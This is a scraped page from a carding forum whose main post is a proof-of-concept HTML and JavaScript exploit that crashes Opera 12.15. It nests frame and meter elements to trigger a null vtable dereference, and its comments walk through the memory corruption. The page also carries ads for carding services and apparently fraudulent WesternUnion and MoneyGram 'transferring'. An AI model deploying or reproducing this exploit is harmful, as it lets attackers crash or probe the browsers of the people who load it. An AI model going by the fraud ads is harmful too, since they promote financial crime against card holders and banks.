We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
Opera 12.15 Denial Of Service

#1
Opera 12.15 memory exhaustion denial of service proof of concept exploit.

Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> Opera 12.15 DOS POC</title>
</head>
<body>
<iframe id="wnd"></iframe>
<script type="text/javascript" language="JavaScript">

/*
   Test: Windows 7 x64
   Version: Opera 12.15 Win32
   Link: www.opera.com
*/

  var wnd = document.getElementById("wnd");
      wnd = wnd.contentWindow;
        
  function d00m()
  {    
               var tag   = [];
               tag.push(document.createElement("frame"));
               tag.push(document.createElement("meter"));
            
               wnd.document.body.appendChild(tag[0]);
               wnd.document.body.appendChild(tag[1]);

               /* step 1*/
               var obj   = tag[1];
                  
               var obj_1 = tag[0];
                      
               try{ obj_1.appendChild(obj); }catch(b){}
                                                                /* eax = [esi + 14h] = this->unknow20 */
               try{ obj_1.getBoundingClientRect(); }catch(a){}  /* ecx = [eax + 14h] = this->unknow20->unknow20 */
                                                                /* eax = [ecx] = this->unknow20->unknow20[vtBl] (correnct) */
               /* step 2*/  
               var obj   = tag[0];
      
               var obj_1 = tag[1];
                    
               try{ obj_1.appendChild(obj); }catch(b){}      
            
               try{ obj_1.getBoundingClientRect();}catch(a){}   /* eax = [esi + 14h] = this->unknow20 */
                                                                /* ecx = [eax + 14h] = this->unknow20->unknow20 */      
    }                                                           /* eax = [ecx] = this->unknow20->unknow20[vtBl] (uncorrect) 0x00000000 reference */
    
    d00m();


    /* so we have here some kind of memory corruption */
    /* in "step 1" "vulnerable" code works fine he gets refernce to vtable and do some stuff */
    /* in "step 2" the same code do the same thing but vtable of refernced object is corrupted and has value 0x0000000*/
    /* logically next step should be checking why the vtable in "step 2" is corrupted */
    /* i observed heap allocation and free function between "step 1" and "step 2" - no alloc or free of intersting area occurs (but maybe i fuckup something) */
    /* We also can set mem access breakpoint on [eax+14h] at the right moment to find out what corrupt vtable */
    
    
    
   </script>
   <!--088241c155f232f70fcae7020157b9dcff210b84-->
  </body>
</html>
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted WesternUnion / MoneyGram / Bank - Transferring -WorldWide [ MTCN in 3 hours ]




Forum Jump: